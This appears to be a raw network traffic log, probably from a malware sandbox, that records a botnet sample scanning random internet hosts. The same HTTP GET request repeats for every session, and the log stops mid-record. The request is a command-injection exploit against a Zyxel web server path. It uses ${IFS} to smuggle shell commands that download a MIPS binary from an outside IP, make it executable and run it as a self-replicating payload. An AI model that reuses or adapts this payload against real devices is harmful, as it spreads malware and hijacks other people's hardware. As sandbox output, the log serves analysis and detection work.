                                    Jan 13, 2024 19:02:24.953140020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2074192.168.2.133931683.193.118.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953187943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2075192.168.2.1332922140.197.36.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953196049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2076192.168.2.133732463.188.129.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953263044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2077192.168.2.1348634198.216.235.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953278065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2078192.168.2.134022012.75.81.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953320026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2079192.168.2.134647677.205.172.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953352928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2080192.168.2.13428424.78.43.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953361034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2081192.168.2.1350376189.57.222.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953413010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2082192.168.2.1333848220.160.158.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953444958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2083192.168.2.1338358201.115.85.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953476906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2084192.168.2.134783657.159.253.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953509092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2085192.168.2.1350660103.137.246.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953562975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2086192.168.2.135751027.159.185.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953599930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2087192.168.2.136054066.171.32.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953633070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2088192.168.2.1355424147.25.182.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953682899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2089192.168.2.1348442193.238.164.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953696012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2090192.168.2.133419814.216.179.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953748941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2091192.168.2.1340256157.21.71.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953788996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2092192.168.2.135020699.42.157.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953840971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2093192.168.2.134076654.48.47.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953862906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2094192.168.2.135587058.56.142.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953896999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2095192.168.2.1338028180.89.157.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953932047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2096192.168.2.135200025.57.215.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953962088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2097192.168.2.1346610152.135.6.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953984976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2098192.168.2.135326024.9.195.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954050064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2099192.168.2.1335416173.172.5.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954086065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2100192.168.2.1334936180.70.50.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954108000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2101192.168.2.1336398154.51.23.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954178095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2102192.168.2.1333976187.43.174.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954190969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2103192.168.2.1360696211.65.250.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954232931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2104192.168.2.1345476195.12.1.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954258919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2105192.168.2.134797834.247.74.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954286098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2106192.168.2.1334002108.190.18.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954317093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2107192.168.2.1358572216.86.214.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954392910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2108192.168.2.133525224.23.48.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954413891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2109192.168.2.1336830105.81.211.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954442024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2110192.168.2.1357294197.214.131.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954482079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2111192.168.2.1343336135.99.186.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954547882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2112192.168.2.1351020218.208.247.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954574108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2113192.168.2.1352812152.250.75.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954598904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2114192.168.2.1339438146.92.74.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954685926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2115192.168.2.1349640201.203.67.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954688072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2116192.168.2.134125887.14.148.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954720974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2117192.168.2.134894249.219.134.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954763889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2118192.168.2.134730025.251.75.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954778910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2119192.168.2.1357790165.15.120.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954823971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2120192.168.2.1340850209.45.193.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954857111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2121192.168.2.134034444.197.58.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954885960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2122192.168.2.1355812140.151.205.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954940081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2123192.168.2.135429645.34.124.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.954976082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2124192.168.2.1354542133.72.182.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955010891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2125192.168.2.1344106180.220.38.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955029011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2126192.168.2.133633850.71.56.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955065966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2127192.168.2.135442423.115.105.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955113888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2128192.168.2.135478627.77.59.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955141068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2129192.168.2.1359192171.117.19.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955171108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2130192.168.2.1344484163.81.253.246443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955210924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2131192.168.2.1336712115.114.140.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955260038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2132192.168.2.135765240.206.38.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955269098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2133192.168.2.134870482.40.95.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955305099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2134192.168.2.1360272163.71.102.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955319881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2135192.168.2.1359360192.174.27.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955384016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2136192.168.2.1354648177.27.43.16443
                                    TimestampBytes transferredDirectionData
